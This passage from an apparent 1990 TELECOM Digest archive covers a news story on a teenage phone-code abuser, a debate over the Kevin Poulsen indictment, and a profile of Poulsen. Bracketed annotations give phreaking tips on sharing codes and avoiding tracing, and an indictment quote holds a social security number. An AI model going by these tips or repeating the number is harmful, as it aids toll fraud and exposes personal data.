  "You feel you have to try it. It's just like WarGames." [Ah Ha! There it is!]
  Once he'd broken into a system, he'd spread the news to his computer buddies
connected to a special bulletin board for hackers. He says participating on
the bulletin board was just like hanging out with a crowd. "It was competition,
braggin."
  Last year Medica and some computer friends aquireda Bell Canada credit card
from a hacker bulletin board. They used the number to embark on a long-distance
phone binge that lasted two days. [Well, THERE'S A SMART MOVE.] They phoned
British Columbia, California, London, and Sidney, Australia.
  The call to Sidney lasted two hours and included ording an Australian pizza
from Pizza Hut. Calls to Brian Mulroney's office in Ottawa and the KGB in
Moscow were unsuccessful.
  Medica says he also got access codes for a local company called Video 1,
allowing him to call commercial party lines on the 976 exchange at the
company's expense. He says that unlike other hackers, he never sold the access
codes.
  "I wasn't into it that seriously." [Obviously, you got caught, didn't you.]
  The access codes were available to all participants of the hackers boards, he
says. He found out about the hacker board through pirate boards which
distribute illegally obtained software. He learned about pirate boards through
friends. There are about 100 pirate boards in the Toronto area, says Medica.

[ 100 eh? Hmmm, I wonder if that's as high as he can count? He forgot the
  other 300+ that he couldn't get on.

  BUT! I am being very critical. Personally, it could all be a front for the
  press. It's what I might do.. Actually, I wouldn't talk to the press at all.

  If this is not a front, which is highly likely, then this guy must be crazy.
  Using codes that were made public on a Hacker (or any other type of) BBS is
  totally insane. Never distribute your codes to anyone but your immediate
  group members (or friends) and don't accept codes from anyone but them.

  I stay away from codes all-together. They are easy to trace, and you don't
  learn anything from using them. Hack your own codes, and crack your own
  systems. Don't abuse someone else's efforts. ]


Date: Fri, 19 Jan 90 00:57:36 PST
From: John Gilmore <gnu@toad.com>
Subject: More Net Friends Charged With Telephone/Computer Crimes


'Tis my sad duty to report to you-all that three folks, Kevin Poulsen,
Mark Lottor (mkl@sri.com), and Robert Gilligan (gilligan@sun.com) have
been charged by the San Jose US Attorney with nineteen counts (mostly
bogus) of telephone and computer crimes.

I got a copy of the 3-page press release from a friendly newspaper
reporter, as well as the 15-page indictment.  Curiously, the
defendents have not been given a copy of the indictment yet, though it
is being blasted out to the press (the reporter got it by fax!).  The
press release is from the US Attorney's office; you can call Robert R.
Crowe at +1 408 291 7221 to complain about it.  The press seems to
have been taken in by this and is giving it a lot of coverage; one
report was that 20 cameramen showed up at the "scene of the crime"
this morning in an attempt to interview a defendent.

The indictment starts off with a conspiracy charge in a feeble attempt
to tie the three defendents together, then proceeds through a bunch of
separate "counts".  Many of these are completely bogus, e.g.  they are
three separate charges under Title 42, USC 408(g)(2) with:

	"...for the purpose of obtaining telephone service from
	Pacific Bell Telephone under a false name, with intent to
	deceive, falsely represented his social security account
	number to be 549-64-3121, when in fact, such number was not
	his social security number".

There are three other charges under 18 USC 1342 with:

	"...for the purpose of defrauding Pacific Bell Telephone
	Company, used, assumed and requested to be addressed by a
	fictitious, false, and assumed name other than his own
	proper name and received from any post office or authorized
	depository of mail matter a letter addressed to such
	fictitious, false and assumed name other than his own proper
	name, specifically, Robert E. Gilligan assumed, used and
	requested to be addressed and to receive mail in the name of
	John Billings...".

Not all the charges are this much hot air, but it really looks to me
like the prosecuters are more interested in writing press releases
than in serving justice.

In short, the charges are:

  1 count conspiracy
  1 count "possession of access devices", 18 USC 1029(a)(3), (b)(2)
  1 count "ownership of a test circuit pack", 18 USC 2512
  3 counts giving the phone company a fake SS#
  3 counts giving the phone company a fake name
  1 count use of calling cards in fake names, 18 USC 1029(a)(2), (b)(2)
  1 count use of a testset to intercept a call
  1 count intercepting a Pacbell security person's conversation 
  1 count attempted access to US Army MASNET, 18 USC 1030(a)(3)
  1 count "intent to transfer" MASNET access codes, 18 USC 1030(a)(6)
  1 count "obtained with intent to convert to his use or gain" Secret
          classified orders from a Ft Bragg military exercise, 18 USC 641
  2 counts intercepting specific phone calls, 18 USC 2511(1)(a)
  1 count "stole a computer printout which was in the custody of
	  PacBell pursuant to a contract with the FBI and which
	contained cable/pair assignments and phone numbers of Ferdinand
	Marcos and others who were target of an FBI investigation" 18 USC 641
  1 count possession of access-device making equipment (including a
	POS terminal for verifying credit card limits!), 18 USC 1029(a)(4),
	(b)(3)

In short, there is little computer crime in here -- mostly the normal
life of a private person (not giving your name to the phone company,
not giving out your SS# to people who have no legal need for it),
having an interest in phones, some possible phreaking, and some
fantasies about innocent stuff they found in searching an apartment.
I find it quite interesting that they are charging these guys with
intercepting calls when it's clear that that's exactly what the FBI
was doing with Ferdinand Marcos's cable pair assignments...but don't
worry, it's against the law for anyone but Big Brother to listen in on
you.

I'll find a copy of these laws sometime soon and see how bad they are.
18 USC 1029 and 1030 are new laws and are specifically mentioned in
the "press release".  1029, on "access devices", is being used to
charge these folks with possession of keys; use of calling cards
issued under false names; and possession of a POS terminal and
locksmith tools.  Sounds like most modern laws -- broad enough to
charge anybody who they want to "get"...and broad enough to be tacked
on to any other charge to give them more to plea bargain with.  And
the ones on use of an incorrect SS# "with intent to deceive"!  Last I
heard, it was not illegal to deceive (lie to) private companies about
your SS#, though it is illegal to defraud (cheat) them.  Welcome to
New Amerika!


Date: Sat, 20 Jan 90 1:37:01 CST
From: Patrick Townson <ptownson@eecs.nwu.edu>
Subject:  Re: More Net Friends Charged With Telephone/Computer Crimes


The purpose of this message is NOT to give an opinion as to the guilt
or innocence of the persons discussed in the original message. Only
the court can rule upon the facts, and detirmine the guilt or
innocence of the defendants. This message is intended ONLY to address
Mr. Gilmore's presentation itself, and discuss what he feels are
frivolous charges.

In volume 9, issue 36 John Gilmore <gnu@toad.com> writes:

>'Tis my sad duty to report to you-all that three folks, Kevin
>Poulsen, Mark Lottor (mkl@sri.com), and Robert Gilligan
>(gilligan@sun.com) have been charged by the San Jose US Attorney with
>nineteen counts (mostly bogus) of telephone and computer crimes.

>The indictment starts off with a conspiracy charge in a feeble attempt
>to tie the three defendents together, then proceeds through a bunch
>of separate "counts".  Many of these are completely bogus, e.g.
>they are three separate charges under Title 42, USC 408(g)(2) with:

>	"...for the purpose of obtaining telephone service from
>	Pacific Bell Telephone under a false name, with intent to
>	deceive, falsely represented his social security account
>	number to be 549-64-3121, when in fact, such number was not
>	his social security number".

>There are three other charges under 18 USC 1342 with:

>	"...for the purpose of defrauding Pacific Bell Telephone
>	Company, used, assumed and requested to be addressed by a
>	fictitious, false, and assumed name other than his own
>	proper name and received from any post office or authorized
>	depository of mail matter a letter addressed to such
>	fictitious, false and assumed name other than his own proper
>	name, specifically, Robert E. Gilligan assumed, used and
>	requested to be addressed and to receive mail in the name of
>	John Billings...".

When an application is made for an extension of credit, it is illegal
to misrepresent who you are. In this case, telco would be the
creditor.  Credit is not a *right*. It does not have to be given to
anyone. Telco must provide service to all *qualified* applicants, and
in this instance, a qualified applicant is one who has demonstrated an
ability and willingness to pay for the service. More on this later.

>In short, the charges are:
  
   (list edited, to address only certain issues)

>  3 counts giving the phone company a fake SS#
>  3 counts giving the phone company a fake name
>  1 count use of calling cards in fake names, 18 USC 1029(a)(2), (b)(2)

Here again, the use of a calling card is the use of an extension of
credit given by telco. It is a crime to apply for credit under a fake
name or using fake credentials, period. No actual loss to the creditor
has to occur. The fact is, the creditor is entitled to set whatever
parameters he desires to define 'credit worthy'; this is not an option
left to the subscriber or purchaser of the service. If you
misrepresent who you are for the purpose of obtaining an extension of
credit, you have committed a federal felony. If you place your written
misrepresentation in a US Postal Service receptacle, you have
committed mail fraud as soon as the envelope lands in the basket
inside. If your oral misrepresentation causes the creditor to place
something inside a mail receptacle, i.e. your monthly bill, then
again, *you* have committed mail fraud.

By 'extension of credit' I mean that these gentlemen could have been
obliged by telco to make a sizeable down payment of earnest money --
or deposit against future charges -- before service was established.
Or, they could have been obliged to make calls from pay stations, on a
pay- as-you-go basis.

>  1 count use of a testset to intercept a call
>  1 count intercepting a Pacbell security person's conversation 

Interception of calls is illegal, whether it is by a private party or
the government without the permission of a court. If these charges are
proven to be factual, then they are very serious matters. I would ask
Mr. Gilmore if he would like to be the victim of such an intercept.
Even 'security persons' have the right to assume their conversation on
the phone is private.


>  1 count attempted access to US Army MASNET, 18 USC 1030(a)(3)
>  1 count "intent to transfer" MASNET access codes, 18 USC 1030(a)(6)
>  1 count "obtained with intent to convert to his use or gain" Secret
>          classified orders from a Ft Bragg military exercise, 18 USC 641

Another way of phrasing it is a charge of attempted burglary; a charge
of attempted theft; plus a charge of theft by deception. If Mr.
Gilmore feels this is not all that serious, perhaps he will share his
modem phone number and personal passwords with us; or not raise too
much of a fuss if someone finds them and uses them.

>  2 counts intercepting specific phone calls, 18 USC 2511(1)(a)

As above; only a court can authorize a wire; would you want it any
other way?

>  1 count "stole a computer printout which was in the custody of
>  PacBell pursuant to a contract with the FBI and which
>  contained cable/pair assignments and phone numbers of Ferdinand
>  Marcos and others who were target of an FBI investigation" 18 USC 641

So now we have another charge of theft. Yes, that is what it is called
when some sleaze on the subway gets into your pockebook -- why not
call it that when someone rifles an office or a briefcase? Does the
fact that the offender is smart enough he doesn't have to strong-arm
you on the street make a difference in the seriousness of the crime?

>  1 count possession of access-device making equipment (including a
>  POS terminal for verifying credit card limits!), 18 USC 1029(a)(4),
>	(b)(3)

What business does anyone have verifying the credit limits of some
other person lacking some business transaction involving credit? Who
the hell are you -- or anyone -- to verify my credit standing unless
we are transacting business with each other?

>In short, there is little computer crime in here -- mostly the normal
>life of a private person (not giving your name to the phone company,
>not giving out your SS# to people who have no legal need for it),

I would suggest that electronic burglary, i.e. breaking and entering
into the military computers and the theft of the information in the
one computer is a 'computer crime', and a rather serious one at that.
If Mr. Gilmore does not regard breaking and entering into a computer
to be a 'computer crime' what does he consider to be such a crime?

I would suggest that tampering with a communications computer, i.e. a
central office ESS to intercept phone calls is a computer crime, if
indeed the alleged interception was done in that manner.

>mostly the normal life of a private person (not giving your name to the
>phone company, not giving out your SS# to people who have no legal
>need for it.....

Most people do not try to defraud the phone company. Most people do
not give bogus identification to the phone company. Telco will list
(or not) the service under any name desired, within reason. They will
send the bill to any third party. But the person who ultimatly
guarentees the payment *must* be known to telco, like any other
creditor. If these allegations of the government are found to be
factual, then I'd say these fellows have a problem: if they intended
to deal in good faith with telco, their true identities would have
been part of telco's service record.

>not giving out your SS# to people who have no legal need for it.

Legal need is one thing; consideration for an extension of credit is
another; or does Mr. Gilmore assume telco should just take the word of
everyone who comes in that everything will be alright and telco will
get paid?  As stated above, when the creditor *gives consideration to*
your request for credit, he requires something by which to positively
identify yourself and your history of meeting your obligations. It is
a perfectly acceptable trade off: identify yourself to your creditor's
satisfaction and your creditor will give consideration to your request
for credit.

This is something that has confused many people in the past: do you,
or don't you have to produce an SSN on the request of a merchant?  NO,
YOU DO NOT!  But....the merchant is NOT obliged to do business with
you on any basis other than CASH. No checks, no credit cards, no open
account -- just cold hard cash, deposit twenty five cents for the
first minute please.....

You don't like those terms, and want to cash your checks, use your
credit or otherwise pay in a more convenient way? Then meet the
creditor's terms.  And the federal government says if you decieve the
creditor in *any way*, they have a beef with you.

>just like the normal life of a private person...

And as a further example, he gives...

>having an interest in phones, some possible phreaking, 

About 95 percent of the public has no idea how phones work, could care
less how they work (until the CO burns down, the employees go on
strike, or the software gets a bug in it), and do not phreak. Most
people do not know anything more than listen for dial tone, dial the
number, talk and hang up. The defendants here are hardly 'normal
living private persons', if their knowledge of telecom is any
indicator.

>some possible phreaking,

Note how casually Mr. Gilmore dismisses this. Instead, substitute the
phrase, 'some possible burglaries; some possible thefts by deception;
possibly some breaking and entering....'

>normal lives of private persons.....

Most people do not burglarize the space of others, be it electronic or
physical in nature. They do not practice theft by deception. 

>and some fantasies about innocent stuff they found in searching 
>an apartment.  

Oh! And, uh, if its not asking too much, WHO authorized the searching
of the apartment? If this is shown to be factual, and if no one can be
found who authorized the 'search', then the 'search' becomes a
burglary...this time of a physical place rather than an electronic
one.

But perhaps I mis-read this. Perhaps the defendants had been invited
by someone to come to their home and search through their possessions.

>I find it quite interesting that they are charging these guys with
>intercepting calls when it's clear that that's exactly what the FBI was
>doing with Ferdinand Marcos's cable pair assignments...

The difference is, the one wire was authorized by a court; the other
one was not. I personally find all wires distasteful -- particularly
those committed by unauthorized persons -- but at least the FBI took
the trouble to do it legally I assume.

And if the FBI did not do it legally? None of us here have virgin ears
and eyes; we all know about the stink at Cincinnatti Bell; the Chicago
Police Red Squad of the 1960's; the marginal legality of some aspects
of the 'war on drugs', etc.... but is the writer saying the current
defendants were no more naughty than the FBI, therefore they should
not be punished if they are found guilty?

>but don't worry,
>it's against the law for anyone but Big Brother to listen in on you.

Let's quit playing games and pointing fingers. Yes, it is illegal for
anyone to listen to your private conversations except the government,
and then, only by specific court order. Mr. Gilmore seems to be almost
confessing for the defendants now, by his admission that the alleged
acts were illegal. But that isn't what he meant. He meant since it is
okay for the government to break the law, it should be okay for the
defendants to do so also. I think otherwise.

>use of calling cards issued under
>false names; and possession of a POS terminal and locksmith tools.
>Sounds like most modern laws -- 

Maybe, but it hardly sounds like the normal life of your average
private person who typically does not carry credit cards with false
names; does not possess a POS terminal unless he is a merchant using
it in his legitimate business; does not have locksmith tools unless he
is a locksmith by trade; and doesn't go around tapping phones,
burglarizing computers and stealing documents.

>broad enough to charge anybody who they want to "get"

Why should the government 'want to get' these chaps? It sounds to me
like the government doesn't need any excuses to 'get' them....if the
claims by the government are factual, then these fellows are hardly
model citizens being persecuted by an evil government.

>And the ones on use of an
>incorrect SS# "with intent to deceive"!  Last I heard, it was not
>illegal to deceive (lie to) private companies about your SS#, though
>it is illegal to defraud (cheat) them.  

It is illegal to deceive anyone for the purpose of obtaining an
extension of credit. If some attorney told you it was not illegal to
deceive your creditor, I suggest you ask for your retainer back and go
find another attorney. Actual loss to the creditor is not required.
The creditor's victimization begins when he grants you credit you
should not (by his standards) be given. He is at risk at that point.
And the feds will back up the creditor *every time* on this. Conduct
business by mail and you can add mail fraud to the rap.

>Welcome to New Amerika!

Isn't that precious..... I'll repeat: quit the game playing and the
role of martyr. If your 'net friends' are found to be guilty, tell
them to quit their belly-aching and take their medicine like a
man-child. A couple years Federal Probation might just hit the spot.
If they follow your line of reasoning, and get too arrogant in court,
that Federal Probation might turn into a couple years in the custody
of the Attorney General or his authorized representative instead.

And if they are not guilty, and all these things the government has
said about them are just damnable lies, by a government 'out to get
them....'

Well then, they can take comfort in the words of Oscar Wilde, who once
said,

     "Injustice? Well I can live with injustice. I've had it heaped
      on me many times...

      But justice.....its justice that stings.....  "



Patrick Townson

**This message was NOT intended to express an opinion about the guilt
or innocence of the defendants. Only the court can detirmine the facts.
It was intended to address tbe recent remarks by Mr. Gilmore.**


From telecomlist-request@mailinglists.eecs.nwu.edu Sun Jan 28 14:59:55 1990
Received: from delta.eecs.nwu.edu by gaak.LCS.MIT.EDU via TCP with SMTP
	id AA11564; Sun, 28 Jan 90 14:59:50 EST
Received: from mailinglists.eecs.nwu.edu by delta.eecs.nwu.edu id ab26020;
          28 Jan 90 13:21 CST
Received: from mailinglists.eecs.nwu.edu by delta.eecs.nwu.edu id ac25758;
          28 Jan 90 12:15 CST
Date:     Sun, 28 Jan 90 11:49:41 CST
From: TELECOM Moderator <telecom@eecs.nwu.edu>
[To]:     telecom@eecs.nwu.edu
Subject:  TELECOM Digest Special: Computer Crime
Message-Id:  <9001281149.ab01824@delta.eecs.nwu.edu>
Status: RO


TELECOM Digest     Sun, 28 Jan 90 11:45:00 CST    Special: Computer Crime

Today's Topics:                             Moderator: Patrick Townson

    Re: More Net Friends Charged With Telephone/Computer Crimes (J. Gilmore)

[Moderator's Note: Mr. Gilmore sent this rebuttal several days ago to
my piece which appeared last week. It had to be re-written slightly,
with Mr. Gilmore's approval and assistance due to a couple technical
problems which made it incompatible with Digest software. I am sorry
it isn't as timely as I would have liked; it should have been
distributed several days ago.  As he notes in the first paragraph, the
legal issues raised should probably be best continued in misc.legal.
In a Digest later today, a detailed look at Kevin Poulsen.  PT]
----------------------------------------------------------------------

Subject: Re: More Net Friends Charged With Telephone/Computer Crimes
Date: Tue, 23 Jan 90 01:08:49 -0800
From: gnu@toad.com <John Gilmore>


I believe this discussion is moving way beyond the bounds of Telecom.
However when the moderator blasts me, in part over misunderstandings
of my message, I wish a chance to rebut.  If the Moderator wants to
limit discussion to phone-related stuff after this message, I think
it's a good idea.  We can move the rest of the discussion to
misc.legal.

Patrick Townson got quite upset about my message regarding this
indictment.  I do not have an opinion on whether these folks are
guilty or innocent either.  My problem is with some of the charges and
with how the US Attorney is publicity-chasing with this case.

Mr. Townson says that it is a crime to misrepresent who you are for
"an extension of credit", including telephone service.  I believe this
should be a civil matter, not a criminal one -- and actual harm must
be shown before anyone could be penalized for it.  In other words, if
I tell the phone company my name is Joe Blow, and I pay my bill on
time, it's none of their business whether my mama calls me Suzie
Thunder -- and particularly none of the government's business.  Why is
the extension of credit different than any other commercial
transaction in this regard?

If a company wants to implement policies about who can and who can't
get credit, it is *their* job to check up on me.  It is not the job of
the government to spend tax money to chase me down and prosecute me.

As for extension of credit by Pac Bell...  When *I* have gotten band
new service from Pacific Bell, not moved from a previous address in
the same telco (e.g. when moving out of a shared household into my own
house), I had to put up a cash deposit before they would offer me
service.  Under those circumstances, is telco "extending me credit"?
I occasionally receive mid-month bills saying "you used your phone a
lot, we want you to pay it now" or "did you make all those calls or
has somebody been charging calls to your number?".  These mechanisms
let them cut off service til the bill (or a larger deposit) is paid,
and protect them against fraud.  In all cases, when I had had the
phone for a year or two and paid the bills regularly, they refunded
the deposit.  E.g. even if I am "Joe Blow" to them, and TRW doesn't
have a dossier on me, I am still creditworthy to them.

> If you misrepresent who you are for the purpose of obtaining an 
> extension of credit, you have committed a federal felony.

If a California company extends credit to a California customer, the
Feds have jurisdiction?  (Yes, I know the case law that blew the
interstate commerce clause all to pieces -- after FDR almost succeeded
in emasculating the Supreme Court.  It's just not right.)

> If you place your written misrepresentation in a US Postal Service 
> receptacle, you have committed mail fraud as soon as the envelope 
> lands in the basket inside. If your oral misrepresentation causes 
> the creditor to place something inside a mail receptacle, i.e. your 
> monthly bill, then again, *you* have committed mail fraud.

It's a good thing the government runs the mail system, so it can turn
a simple communications service into one which makes judgements about
the contents of its 'packets'.  Happily, Federal Express has a policy
diametrically opposed, e.g. unless the cocaine leaking from your
parcel jams their conveyor belt, it goes through and they ask no
questions and threaten no jail terms.  Their job is carriage, not
providing a hook for one more bogus charge to throw at somebody.

> By 'extension of credit' I mean that these gentlemen could have been
> obliged by telco to make a sizeable down payment of earnest money --
> or deposit against future charges -- before service was established.

What if they *did* pay a deposit?  That seems to be PacBell policy for
customers with no prior service.

> >  1 count use of a testset to intercept a call
> >  1 count intercepting a Pacbell security person's conversation 
> Interception of calls is illegal...

I am not defending the interception of calls.  I was listing the
charges, since the newspaper accounts summarize them and leave out the
actual citations from the US Code.

> >  1 count attempted access to US Army MASNET, 18 USC 1030(a)(3)
> >  1 count "intent to transfer" MASNET access codes, 18 USC 1030(a)(6)
> >  1 count "obtained with intent to convert to his use or gain" Secret
> >          classified orders from a Ft Bragg military exercise, 18 USC 641

I think that "attempted" access and "conspiracy to" crimes are bogus.
Why should it be illegal for Americans to test the security of the a
US Military network?  Should we just believe them if they tell us it
is secure?  If it is truly secure, they have nothing to fear from us.
If it is not secure, we the public have a damn strong reason to want
to know.  [If we enter and do damage, that is a completely separate
issue.  The issue here is the mere attempt to access.]

Also note that there is no apparent tie between the MASNET charges and
the classified orders, which were apparently found in hardcopy form.
Perhaps the guy was in the Air Force and kept some of his old
paperwork?

> >  1 count "stole a computer printout which was in the custody of
> >  PacBell pursuant to a contract with the FBI and which
> >  contained cable/pair assignments and phone numbers of Ferdinand
> >  Marcos and others who were target of an FBI investigation" 18 USC 641
> So now we have another charge of theft.

I am not a believer in theft.

> >  1 count possession of access-device making equipment (including a
> >  POS terminal for verifying credit card limits!), 18 USC 1029(a)(4),
> >	(b)(3)
 
> What business does anyone have verifying the credit limits of some
> other person lacking some business transaction involving credit? Who
> the hell are you -- or anyone -- to verify my credit standing unless
> we are transacting business with each other?

I do not believe that possession of a computer terminal should be a crime.

There is no allegation in the indictment that this terminal was used
to commit a crime.  The mere possession of it is apparently illegal
according to this indictment.  There is no allegation that the
terminal was used to verify anyone's credit standing; perhaps it was
bought for parts from a surplus store.

"If POS terminals are outlawed, only department stores will have POS 
terminals" :-)

I do not believe there is a law or practice restricting credit
information to people 'transacting business with each other'.  You
want the info, TRW sells it, as far as I know.  Feel free to educate
me if I'm wrong.

> >In short, there is little computer crime in here...
>
> If Mr. Gilmore does not regard breaking and entering into a computer
> to be a 'computer crime' what does he consider to be such a crime?

I said LITTLE computer crime -- that means 2 out of 19 charges.  But
that is most of what the press coverage is focusing on, because it's
"high-tech" to talk about computer crimes and it sells papers.

The indictment mentions only breaking into a network, not into any
military computers, and no theft of information therefrom.

> I would suggest that tampering with a communications computer, i.e. a
> central office ESS to intercept phone calls is a computer crime, if
> indeed the alleged interception was done in that manner.

This is going out on quite a limb.  Nothing I posted, and nothing I
read in the indictment, indicated ESS tampering to wiretap.  Testsets
and 'test circuit packs' were mentioned.

There followed a long flame about normal life being incompatible with
a interest in phone equipment, etc.  My comment along these lines was
also misunderstood by another poster.  Let me restate and clarify:

me>In short, there is little computer crime in here -- mostly the normal
me>life of a private person (not giving your name to the phone company,
me>not giving out your SS# to people who have no legal need for it),
me>having an interest in phones, some possible phreaking, and some
me>fantasies about innocent stuff they found in searching an apartment. 

Please read this as "the normal life of a private person (...), AND
having an interest in phones, AND possible phreaking, AND some
[prosecutor's] fantasies about some innocent stuff the PROSECUTOR
found in searching an apartment".

I think that keeping your life private is not computer crime, nor any
crime.  I think having an interest in phones is not computer crime,
nor any crime.  I think phreaking (at least tapping phones) is not
computer crime, though it is definitely a crime.  I think
prosecutorial fantasies about computer terminals are not computer
crimes, nor any crime.

> if they intended to deal in good faith with telco, their true 
> identities would have been part of telco's service record.

If you define good faith as paying for services rendered, nothing in
the charge indicates that their bills were unpaid, simply that they
used false names and ss#'s.  A person is free to use any name(s) they
choose as long as it is not for fraud.  My copy of the Uniform
Commercial Code is misplaced, but I think fraud involves *actual
monetary loss* due to false information.

> It is a perfectly acceptable trade off: identify yourself to your 
> creditor's satisfaction and your creditor will give consideration to 
> your request for credit.

They identified themselves to their creditor's satisfaction --
obviously.  Else their creditor would not have issued them credit,
e.g. provided them with phone service and working calling cards.

> This is something that has confused many people in the past: do you,
> or don't you have to produce an SSN on the request of a merchant?  NO,
> YOU DO NOT!  But....the merchant is NOT obliged to do business with
> you on any basis other than CASH. No checks, no credit cards, no open
> account -- just cold hard cash, deposit twenty five cents for the
> first minute please.....
 
> You don't like those terms, and want to cash your checks, use your
> credit or otherwise pay in a more convenient way? Then meet the
> creditor's terms.

All OK by me.

> And the federal government says if you decieve the creditor in 
> *any way*, they have a beef with you.

That is where I have a problem.  None of the Feds' business.  The
gov't does not exist to intervene in private commercial transactions.

> >I find it quite interesting that they are charging these guys with
> >intercepting calls when it's clear that that's exactly what the FBI was
> >doing with Ferdinand Marcos's cable pair assignments...
 
> The difference is, the one wire was authorized by a court...
> Let's quit playing games and pointing fingers. Yes, it is illegal for
> anyone to listen to your private conversations except the government,
> and then, only by specific court order.

You clearly don't know current law in this regard.  Reread the ECPA.
It does not take a court order to tap your phone these days.  A middle
level bureaucrap at the DoJ can legally do it without consulting a
court.

> Mr. Gilmore seems to be almost confessing for the defendants now, by 
> his admission that the alleged acts were illegal. But that isn't what 
> he meant. He meant since it is okay for the government to break the law, 
> it should be okay for the defendants to do so also. I think otherwise.

Certainly if these guys wiretapped people, their acts were illegal.
My statements have nothing to do with "confession" though.  It's the
hypocrisy of the government that says "the act is evil, but if a judge
or bureaucrat does it, it's OK" that I am complaining about.

[As an aside, I believe that if a law is broken by the government, it
should not be able to prosecute people for breaking it.  If the
government is dealing drugs and weapons in violation of the law, any
case against ordinary people for the same charge should be thrown out.
I am quite tired of government employees thinking they are above the
law; the only way to restrain them from this belief is to nullify the
law's effect on us, e.g. if they won't follow the rules that they
themselves lay down, we don't have to either.]

>> broad enough to charge anybody who they want to "get"
> Why should the government 'want to get' these chaps?

Why should the government issue press releases about an indictment?
Perhaps somebody wants to make a name for themself in the Dept of
Justice by prosecuting a famous case.  Perhaps it has been decided
that it's time to "get tough" on computer crime, so a case that's
mostly telephone crime has been stretched with bullshit charges and
then billed to the ignorant media as a major computer crime case.
Bureacracy has its own internally generated reasons.  These particular
people may not be targets except that they were handy to "make an
example of" at the right time.

> ...if the claims by the government are factual, then these fellows 
> are hardly model citizens being persecuted by an evil government.

Civil rights only apply to model citizens?  That is, model citizens
are permitted to own terminals, but people suspected of other crimes
are not?  If someone plants marijuana refuse (or printouts from
telco's trash bin) in Mr. Townson's trash can and calls the cops, will
his computers and telephone memorabilia, his old copies of
confidential "Telephone Test Code Number Directories" that friends had
given him in violation of telco rules, suddenly become illegal 'tools
of crime' too?  Will his magazine subscription in the name 'Betty
Crocker', so he can identify who is selling his name to mailing lists,
become mail fraud?

> If your 'net friends' are found to be guilty, tell
> them to quit their belly-aching and take their medicine like a
> man-child. A couple years Federal Probation might just hit the spot.
> If they follow your line of reasoning, and get too arrogant in court,
> that Federal Probation might turn into a couple years in the custody
> of the Attorney General or his authorized representative instead.

Right.  Be nice to the thugs and they might put you on probation.  You
better watch out boy and play the game *our way* whether you're
innocent or guilty.  A couple of years of living as if you were in a
totalitarian state would be a nice change of pace.  Permission to
work, permission to move, permission to drive, permission to associate
with your undesirable friends, given or refused by your probation
officer.  Instant arrest and confinement at the government's whim,
without arraignment or trial.  Gee, if we could get everyone living
under these rules, there'd be no need for all those silly elections
and freedoms and stuff.

> And if they are not guilty...
> Well then, they can take comfort in the words of Oscar Wilde...

I would take a lot more comfort in suing the government for harassment
and getting the overzealous US Attorney demoted or fired.  You get the
government you allow to survive.  If you leave petty thugs in there
and go back to reading Wilde, don't complain when thugs run your life.

------------------------------

End of TELECOM Digest Special: Computer Crime
*****************************

From telecomlist-request@mailinglists.eecs.nwu.edu Sun Jan 28 16:45:50 1990
Received: from delta.eecs.nwu.edu by gaak.LCS.MIT.EDU via TCP with SMTP
	id AA15296; Sun, 28 Jan 90 16:45:46 EST
Received: from mailinglists.eecs.nwu.edu by delta.eecs.nwu.edu id aa08091;
          28 Jan 90 15:26 CST
Received: from mailinglists.eecs.nwu.edu by delta.eecs.nwu.edu id aa19183;
          28 Jan 90 14:21 CST
Date:     Sun, 28 Jan 90 13:16:39 CST
From: TELECOM Moderator <telecom@eecs.nwu.edu>
[To]:     telecom@eecs.nwu.edu
Subject:  TELECOM Digest Special: Kevin Poulsen
Message-Id:  <9001281316.ab04870@delta.eecs.nwu.edu>
Status: RO


TELECOM Digest     Sun, 28 Jan 90 13:15:31 CST    Special: Kevin Poulsen

Today's Topics:                             Moderator: Patrick Townson

    Hacker in Trouble: Loner Gone Astray? (Knight-Ridder via TELECOM Moderator)
    Two Surrender in Military Intrusion Case; Third Sought (Joseph Liu)
----------------------------------------------------------------------

Date: Sun, 28 Jan 90 12:44:00 CST
From: TELECOM Moderator <telecom@eecs.nwu.edu>
Subject: Hacker in Trouble: Loner Gone Astray?


[Moderator's Note: This is the story issued by the Knight-Ridder
Newspapers Syndicate several days ago on Kevin Poulsen. A backlog of
work here has kept me from presenting it before now.  PT]

       ==================================================

    SAN JOSE, Calif. -- When Kevin Poulsen's parents bought him his
first computer, they took his interest in it as a good sign,
particularly because their 16-year-old son had recently dropped out of
high school.
  
The Poulsens couldn't conceive that letting their son cloister himself
in his room all day tapping away at the keyboard could be bad for him.

"He was on it many hours. He would stay up all night. I didn't really
know what he was up to until the law knocked on our door," said his
father, Lee.

The knock by FBI agents was the first brush with the law for Kevin,
then 17. Now 24, he is charged by federal authorities with one of the
country's most widespread cases of computer and telephone crime.

He was charged last week with two others with commandeering the
nation's phone network, monitoring and taping phone conversations and
breaking into government computers, including military installations.
He is still at large. (See next article in this issue.)

In conversations several days ago with Lee Poulsen and the mother of a
former girlfriend of Kevin Poulsen's, a picture emerged of a brilliant
but emotionally troubled loner motivated by a need for attention and
for finding out information that few people knew. 

Annette Randol, the former girlfriend's mother, said young Poulsen
became obsessed with her daughter and began stalking her through the
phone lines and taping her family's conversations. She said that he
bragged that his accomplishments as a hacker had landed him a job with
a Silicon Valley company.

Additionally, Randol and Lee Poulsen both said that the FBI had asked
for Kevin Poulsen's help in tracking down computer and telephone
criminals. But they said Kevin refused because of loyalty to his
hacker friends. 

Poulsen's father said he had last heard from his son three weeks ago
and that he had refused to give him the address for his Los Angeles
apartment. 

Like most hackers, Poulsen started out as a phone phreak, one of those
who pirate the national phone network by obtaining phone numbers and
access codes. 

It was through this network that in April, 1978, Kevin met Sean
Randol, a quiet, bookish young girl who turned out to live only a mile
from the Poulsens in North Hollywood, said Sean's mother, Annette.

Responding to a classified ad, Sean and her mother accidentally
stumbled on a telephone bulletin board that gave out the numbers of
phone phreak conference lines. Once a loner, Sean had found a way to
make new friends and quickly took to the phone phreak networks.

Annette Randol describes the two as soulmates who immediatly hit it
off, both avid readers and both loners. "He started out with my
daughter because she was lonely too," she said. "She loved him, but
she loved him as a friend."

Gradually, after three years, her mother says, the friendship faded.
Sean grew interested in other pursuits and other people. But Kevin
didn't share those feelings and wanted to continue the relationship,
her mother said. It ended abruptly when Kevin returned from the Bay
Area for Christmas and took Sean out to dinner. But instead of
bringing her home, Kevin took Sean on a 'wild ride' that frightened
her. After that, she refused to see him again.

But Sean's refusals just fueled Kevin's obsession. He had his sister,
who worked in the same Los Angeles supermarket as Sean, take pictures
of her at work. And two years ago, he allegedly tapped into the
family's phone lines and taped all their conversations without their
knowledge over a two-week period. Those tapes are part of the
indictments against Poulsen in the case pending. 

Sean was not Kevin's only obsession. Ally Sheedy, the actress who
played the hacker's girlfriend in the movie 'War Games' became the
object of phone preaks' and hackers' desire, a kind of underground
